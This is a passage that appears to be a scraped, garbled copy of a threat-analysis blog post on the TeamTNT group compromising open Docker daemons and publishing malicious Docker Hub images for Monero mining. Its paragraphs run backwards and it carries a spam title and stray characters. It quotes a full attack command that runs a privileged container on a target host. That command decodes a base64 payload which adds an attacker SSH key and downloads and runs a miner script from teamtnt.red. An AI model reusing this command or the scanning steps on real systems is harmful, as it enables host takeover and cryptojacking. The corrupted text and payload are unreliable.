![use gifsicle malicious image use gifsicle malicious image](https://www.surveycrest.com/blog/wp-content/uploads/2014/12/iStock-916417674-500x241.jpg)
They always have the same goal, mining Monero, but they use different methods to try to maximize their mining.
USE GIFSICLE MALICIOUS IMAGE SERIES
In this series of posts, we have explored how the TeamTNT group is able to massively scan and compromise open Docker daemons. This is strange behavior because the same group did check if the host was already infected on another occasion. Since the script is aggressively scanning the Internet, it is normal to re-infect already infected systems, as there’s no check to see if they are already running. ‘docker -H $D_TARGET run -d -privileged -net host -v /:/host alpine chroot /host bash -c 'echo c3NoLWtleWdlbiAtTiAiIiAtZiAvdG1wL1RlYW1UTlQKCmNoYXR0ciAtUiAtaWEg元Jvb3QvLnNzaC8gMj4vZGV2L251bGw7IHRudHJlY2h0IC1SIC1pYSAvcm9vdC8uc3NoLyAyPi9kZXYvbnVsbDsgaWNoZGFyZiAtUiAtaWEg元Jvb3QvLnNzaC8gMj4vZGV2L251bGwKY2F0IC90bXAvVGVhbVROVC5wdWIgPj4g元Jvb3QvLnNzaC9hdXRob3JpemVkX2tleXMKY2F0IC90bXAvVGVhbVROVC5wdWIgPiAvcm9vdC8uc3NoL2F1dGhvcml6ZWRfa2V5czIKcm0gLWYg元RtcC9UZWFtVE5ULnB1YgoKCnNzaCAtb1N0cmljdEhvc3RLZXlDaGVja2luZz1ubyAtb0JhdGNoTW9kZT15ZXMgLW9Db25uZWN0VGltZW91dD01IC1pIC90bXAvVGVhbVROVCByb290QDEyNy4wLjAuMSAiKGN1cmwgaHR0cDov元RlYW10bnQucmVk元No元NldHVwL21vbmVyb29jZWFuX21pbmVyLnNofHxjZDEgaHR0cDov元RlYW10bnQucmVk元No元NldHVwL21vbmVyb29jZWFuX21pbmVyLnNofHx3Z2V0IC1xIC1PLSBodHRwOi8vdGVhbXRudC5yZWQvc2gvc2V0dXAvbW9uZXJvb2NlYW5fbWluZXIuc2h8fHdkMSAtcSAtTy0gaHR0cDov元RlYW10bnQucmVk元No元NldHVwL21vbmVyb29jZWFuX21pbmVyLnNoKXxiYXNoIgoKcm0gLWYg元RtcC9UZWFtVE5UCgo= | base64 -d | bash'’
![use gifsicle malicious image use gifsicle malicious image](http://highstermobile.co/blog/wp-content/uploads/2016/01/1396463582-4-ways-stop-people-from-using-phones-during-meetings-2.jpg)
It installs the curl, wget, jq, masscan, libpcap-dev, go, git, gcc, make and docker packages that it will need for the next steps.Ģ. Download zgrab (a banner grabber written in Go) from and compile it.ģ. Start masscan in a random public subnet looking for open Docker daemon ports There are three different functions that perfectly explain what it is trying to do:ġ. Prepare the container. The pause bash script is a simple script, but it works really well. Once the container is created, the pause script is executed. It is a simple alpine image with only two modifications: the installation of bash and the copy of the pause bash script that will handle all the operations. If we have a closer look at the image using the tool ‘dive’, you can see that the image was created with the following Dockerfile: At the moment this post was published, it had almost 4,000 downloads, and you can see that the user has other docker images (all of them related to either mass scanning or mining using XMRig). The alpineos/dockerimage is a public Docker image available at Docker Hub. This Docker image is the one responsible for the scanning and infection that we described in our last blog post. In this blog post, we will describe another method we have observed that includes the use of malicious Docker images available at Docker Hub. You may have seen our recent posts about how TeamTNT is abusing Docker daemons for mining Monero.